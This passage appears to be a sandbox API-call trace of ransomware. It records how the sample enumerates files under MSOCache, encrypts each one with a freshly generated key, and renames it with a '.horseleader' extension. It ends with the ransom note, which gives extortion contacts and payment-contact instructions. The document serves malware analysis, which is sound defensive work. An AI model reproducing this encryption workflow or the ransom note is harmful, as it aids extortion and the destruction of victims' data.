pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0195.972] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\.." (normalized: "c:\\msocache\\all users"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0195.972] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5f356eb0, ftCreationTime.dwHighDateTime=0x1cbe576, ftLastAccessTime.dwLowDateTime=0x5f356eb0, ftLastAccessTime.dwHighDateTime=0x1cbe576, ftLastWriteTime.dwLowDateTime=0x43bdc500, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x1861, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0195.972] lstrcmpiW (lpString1="Setup.xml", lpString2="Windows") returned -1 [0195.972] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0195.972] StrStrIW (lpFirst="Setup.xml", lpSrch=".horseleader") returned 0x0 [0195.972] lstrcmpW (lpString1="Setup.xml", lpString2="#Decrypt#.txt") returned 1 [0195.972] lstrcmpW (lpString1="Setup.xml", lpString2="_uninstalling_.png") returned 1 [0195.972] lstrlenW (lpString=".testttjffg") returned 11 [0195.972] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".testttjffg") returned 0x0 [0195.972] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0195.972] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0195.972] CreateFileW 
(lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0196.010] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0196.010] StrStrW (lpFirst="Setup.xml", lpSrch=".txt") returned 0x0 [0196.010] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=6241) returned 1 [0196.010] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x1861, lpOverlapped=0x0) returned 1 [0196.019] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffe79f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0196.019] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x1861, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x1861, lpOverlapped=0x0) returned 1 [0196.020] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0196.020] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0196.020] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0196.020] CloseHandle (hObject=0x21c) returned 1 [0196.020] GetProcessHeap () 
returned 0x780000 [0196.020] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d7fd8 [0196.020] wnsprintfW (in: pszDest=0x7d7fd8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml.horseleader") returned 88 [0196.020] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml.horseleader" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\setup.xml.horseleader")) returned 1 [0196.228] GetProcessHeap () returned 0x780000 [0196.228] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d7fd8 | out: hHeap=0x780000) returned 1 [0196.228] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7fb9f9e0, ftCreationTime.dwHighDateTime=0x1cbe575, ftLastAccessTime.dwLowDateTime=0x7fb9f9e0, ftLastAccessTime.dwHighDateTime=0x1cbe575, ftLastWriteTime.dwLowDateTime=0x437179c0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x30780dd, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="VisioLR.cab", cAlternateFileName="")) returned 1 [0196.228] lstrcmpiW (lpString1="VisioLR.cab", lpString2="Windows") returned -1 [0196.229] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab") returned 78 [0196.229] StrStrIW (lpFirst="VisioLR.cab", lpSrch=".horseleader") returned 0x0 [0196.229] lstrcmpW (lpString1="VisioLR.cab", lpString2="#Decrypt#.txt") returned 1 [0196.229] lstrcmpW (lpString1="VisioLR.cab", lpString2="_uninstalling_.png") returned 1 [0196.229] lstrlenW 
(lpString=".testttjffg") returned 11 [0196.229] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".testttjffg") returned 0x0 [0196.229] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0196.229] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0196.229] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiolr.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0196.230] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab") returned 78 [0196.230] StrStrW (lpFirst="VisioLR.cab", lpSrch=".txt") returned 0x0 [0196.230] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=50823389) returned 1 [0196.230] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0196.230] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0196.381] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0196.381] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0196.588] 
SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x183986e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0196.588] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0196.599] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0196.599] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0196.600] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x30730dd, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0196.600] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0196.683] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0196.683] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0196.684] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0196.684] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0196.684] WriteFile (in: hFile=0x21c, 
lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0196.684] CloseHandle (hObject=0x21c) returned 1 [0196.684] GetProcessHeap () returned 0x780000 [0196.684] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d7fd8 [0196.684] wnsprintfW (in: pszDest=0x7d7fd8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab.horseleader") returned 90 [0196.684] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiolr.cab"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab.horseleader" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiolr.cab.horseleader")) returned 1 [0196.685] GetProcessHeap () returned 0x780000 [0196.685] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d7fd8 | out: hHeap=0x780000) returned 1 [0196.685] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x272b1e70, ftCreationTime.dwHighDateTime=0x1cbe576, ftLastAccessTime.dwLowDateTime=0x272b1e70, ftLastAccessTime.dwHighDateTime=0x1cbe576, ftLastWriteTime.dwLowDateTime=0x435c1d00, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x2ab000, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="VisioMUI.msi", cAlternateFileName="")) returned 1 [0196.685] lstrcmpiW (lpString1="VisioMUI.msi", lpString2="Windows") returned -1 [0196.685] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi") returned 
79 [0196.685] StrStrIW (lpFirst="VisioMUI.msi", lpSrch=".horseleader") returned 0x0 [0196.685] lstrcmpW (lpString1="VisioMUI.msi", lpString2="#Decrypt#.txt") returned 1 [0196.856] lstrcmpW (lpString1="VisioMUI.msi", lpString2="_uninstalling_.png") returned 1 [0196.856] lstrlenW (lpString=".testttjffg") returned 11 [0196.856] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi", lpSrch=".testttjffg") returned 0x0 [0196.856] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0196.856] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0196.856] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0196.857] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi") returned 79 [0196.857] StrStrW (lpFirst="VisioMUI.msi", lpSrch=".txt") returned 0x0 [0196.857] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=2797568) returned 1 [0196.857] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0196.857] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0196.986] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: 
lpNewFilePointer=0xffffffff) returned 1 [0196.986] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0196.986] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x153000, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0196.986] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0197.014] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0197.014] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0197.014] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x2a6000, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0197.014] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0197.026] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0197.026] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0197.026] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) 
returned 1 [0197.026] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0197.027] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0197.027] CloseHandle (hObject=0x21c) returned 1 [0198.537] GetProcessHeap () returned 0x780000 [0198.537] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d7fd8 [0198.537] wnsprintfW (in: pszDest=0x7d7fd8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi.horseleader") returned 91 [0198.538] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.msi"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi.horseleader" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.msi.horseleader")) returned 1 [0198.538] GetProcessHeap () returned 0x780000 [0198.538] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d7fd8 | out: hHeap=0x780000) returned 1 [0198.538] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5f0a8e20, ftCreationTime.dwHighDateTime=0x1cbe576, ftLastAccessTime.dwLowDateTime=0x5f0a8e20, ftLastAccessTime.dwHighDateTime=0x1cbe576, ftLastWriteTime.dwLowDateTime=0x4359ac00, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x251f, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="VisioMUI.xml", 
cAlternateFileName="")) returned 1 [0198.539] lstrcmpiW (lpString1="VisioMUI.xml", lpString2="Windows") returned -1 [0198.539] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml") returned 79 [0198.539] StrStrIW (lpFirst="VisioMUI.xml", lpSrch=".horseleader") returned 0x0 [0198.539] lstrcmpW (lpString1="VisioMUI.xml", lpString2="#Decrypt#.txt") returned 1 [0198.539] lstrcmpW (lpString1="VisioMUI.xml", lpString2="_uninstalling_.png") returned 1 [0198.539] lstrlenW (lpString=".testttjffg") returned 11 [0198.539] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".testttjffg") returned 0x0 [0198.539] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0198.539] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0198.539] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0198.540] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml") returned 79 [0198.540] StrStrW (lpFirst="VisioMUI.xml", lpSrch=".txt") returned 0x0 [0198.540] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=9503) returned 1 [0198.540] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x251f, 
lpOverlapped=0x0) returned 1 [0198.545] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffdae1, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0198.545] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x251f, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x251f, lpOverlapped=0x0) returned 1 [0198.545] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0198.546] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0198.546] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0198.546] CloseHandle (hObject=0x21c) returned 1 [0198.546] GetProcessHeap () returned 0x780000 [0198.546] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d7fd8 [0198.546] wnsprintfW (in: pszDest=0x7d7fd8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml.horseleader") returned 91 [0198.546] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml.horseleader" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.xml.horseleader")) returned 1 [0198.547] GetProcessHeap () returned 0x780000 [0198.548] HeapFree (in: hHeap=0x780000, 
dwFlags=0x0, lpMem=0x7d7fd8 | out: hHeap=0x780000) returned 1 [0198.548] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5f0a8e20, ftCreationTime.dwHighDateTime=0x1cbe576, ftLastAccessTime.dwLowDateTime=0x5f0a8e20, ftLastAccessTime.dwHighDateTime=0x1cbe576, ftLastWriteTime.dwLowDateTime=0x4359ac00, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x251f, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="VisioMUI.xml", cAlternateFileName="")) returned 0 [0198.548] FindClose (in: hFindFile=0x7c67a0 | out: hFindFile=0x7c67a0) returned 1 [0198.548] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\#Decrypt#.txt") returned 80 [0198.548] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\#Decrypt#.txt" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0198.548] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. 
\r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
